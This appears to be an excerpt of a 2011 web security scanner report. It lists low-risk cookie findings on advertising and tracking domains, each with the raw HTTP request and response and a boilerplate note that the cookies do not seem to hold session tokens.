HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; path=/; expires=Mon, 25-Jul-2011 18:46:42 GMT; domain=.adnxs.com; HttpOnly Location: http://ib.adnxs.com/getuidu?http://a.rfihub.com/cm?apxuid=$UID&forward= Date: Tue, 26 Apr 2011 18:46:42 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /seg?add=9175 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; sess=1; uuid2=2724386019227846218
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1kUGf3P4S?x+>Vw#cli2Z%p3WmmQhjt9MdR#CxpF6tp*nq$Nxn<dWF!:QuYDKdseP_h)uJe.26/RX:N1BgJ?D-*wIgTR/'8!kfN=J6^H8$U<*(w#7`hLjeYl`CzVfnEs:6dsF57[+':o@4PCJUi>9^(fHj)#VwSLH:#4Gb1k`'//CV4WLv$glv8CT]v>0DbsqTI#+-X7W>Ick`C7pBmAXmXxR%ge`0M8X/f>NDHX+iEoDQSm4qj@!8HjdgqcY^7cwxlrbWW:X.i/bHKf_o_YEA/LyW)hFu@1/olvQM>q')Qb)rauFa94KII4KAI`UVZW5QvvWInWXio#:w1_scIl_O'$PK*w_BY.U##!MuX+Vqi8H11nF6CJf8gn+.75!Vt'v0`4hVA16S.*3^U5iP>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[WT6aI@mq; path=/; expires=Mon, 25-Jul-2011 18:46:44 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Tue, 26 Apr 2011 18:46:44 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Segment.aspx?sid=93da1b37-e1d8-4a3d-98bc-070baa31f827 HTTP/1.1 Host: idcs.interclick.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 43 Content-Type: image/gif Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252; domain=.interclick.com; expires=Mon, 26-Apr-2021 20:05:54 GMT; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI" Date: Tue, 26 Apr 2011 20:05:54 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTYxNyZ0bD0xNTc2ODAw HTTP/1.1 Host: image2.pubmatic.com Proxy-Connection: keep-alive Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:46:40 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451600; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:40 GMT; path=/ Content-Length: 42 P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: image/gif
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=unponl_cs=1&betq=8288=401583 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; BASE=RgwqoyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nm47UK47HID!; F1=BIaw02E; ROLL=boAno2yqJFBg26I!; C2=wGMtN5pqHIxFG/lovgg3sYMBSKMCItdhwgQ3WXIMIMa4FCDCKGehwgQ3gZIM1qKCaMrxEU7qIEysGCTkBgAoNXUWxOCCsRpBx0I9IsfzFv0i4iQBwWcYw6JCvHpBwVJ9IsuoGH2kQhANZXAcs6OCBMnBwRrcIsNrGAXqHgwzeZAc; GUID=MTMwMzY5MTY5NjsxOjE2cjRvcHExdHZsa21sOjM2NQ
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 26 Apr 2011 18:46:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=HMxtN5pqGIxFGFuovcg3sYkhSK8BItdByeQ3WXgsHMa4FI7BKGeByeQ3gZgs1q6BaMrRGW7qHEysGIbkBcAoNXs2xOyBsRphy2I9HsfzF18i4eQBwW04w65BvHphxXJ9HsuoGN+kQdANZXY8s6+BBMnhxTrcHsNrGGfqHcwzeZY8gCGCvCiBwB; domain=advertising.com; expires=Thu, 25-Apr-2013 18:46:31 GMT; path=/ Set-Cookie: GUID=MTMwMzg0MzU5MTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Thu, 25-Apr-2013 18:46:31 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 05:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Tue, 26 Apr 2011 19:46:31 GMT Content-Type: image/gif Content-Length: 49
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /msftcookiehandler?t=1&c=MUID%3dB506C07761D7465D924574124E3C14DF HTTP/1.1 Host: m.adnxs.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:41:02 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:41:02 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Tue, 26 Apr 2011 18:41:02 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tt?member=280&inv_code=REAB01&cb=1243611902 HTTP/1.1 Host: m.adnxs.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly Date: Tue, 26 Apr 2011 18:39:22 GMT Content-Length: 2226
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home HTTP/1.1 Host: msn.careerbuilder.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 0 Location: http://msn.careerbuilder.com/msn/default.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=fe081d7e64674f419a28ec11735cd32a-357143949-XH-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X1B5CE6DB054A3B8D6808870DFF00DA75B99AE633E9DEE927EA50B31042D43B26AD80CE6783B23EC02694EF5309ECC424A; domain=.careerbuilder.com; expires=Thu, 26-Apr-2012 18:39:09 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEARWEB48 Date: Tue, 26 Apr 2011 18:39:08 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bht/?px=20&v=1&rnd=1303843577231 HTTP/1.1 Host: p.opt.fimserve.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: LO=00MD66Bgm1.00CK000J08NhNS1; Domain=.opt.fimserve.com; Expires=Tue, 26-Jul-2011 18:46:21 GMT; Path=/ Content-Type: text/html Content-Length: 0 Date: Tue, 26 Apr 2011 18:46:20 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event/js?mt_id=101241&mt_adid=100255&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1 Host: pixel.mathtag.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303691668
Response
HTTP/1.1 200 OK Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x4 pid 0x71ef 29167 Cache-Control: no-cache Content-Type: text/javascript P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Tue, 26 Apr 2011 18:46:16 GMT Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 Connection: Keep-Alive Set-Cookie: ts=1303843576; domain=.mathtag.com; path=/; expires=Wed, 25-Apr-2012 18:46:16 GMT Content-Length: 2116
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=803168029;fpan=0;fpa=P0-2123435684-1303854386635;ns=0;url=http%3A%2F%2Fwww.widgetbox.com%2Flist%2Fmost_popular;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303854387569;tzo=300;a=p-3ayZhMX92Pd1o HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://www.widgetbox.com/list/most_popular User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=ECMAFu8kjVmtjIMLyxuBAVcBzQaB0QDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA
Response
HTTP/1.1 302 Found Connection: close Location: http://ad.yieldmanager.com/pixel?id=977076&id=755565&id=744649&id=1056982&id=1056950&id=1056980&id=1056949&id=744655&t=2 Set-Cookie: d=EF0AFu8kjVmtjIMLyxuBAXABzQaB0QDe0k_Boc0jjUKjsY5cH0L-EZIMuBfDCDgYgSIMEDDoQPGRggGhjjH_EADokgAQLbZ6Qw; expires=Mon, 25-Jul-2011 21:46:17 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Tue, 26 Apr 2011 21:46:17 GMT Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /r/beacon?b2=7zRdy3HvetQzzJrusGV0WgUYWXerDbWSrgMFxw-mCPoYOsR8WF6iMILz5GrRaTzYj9ILcvkNLozW5XfQm-OIAw&cid= HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=...[SNIP]...; fc=...[SNIP]...; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1; uid=2931142961646634775; pf=...[SNIP]...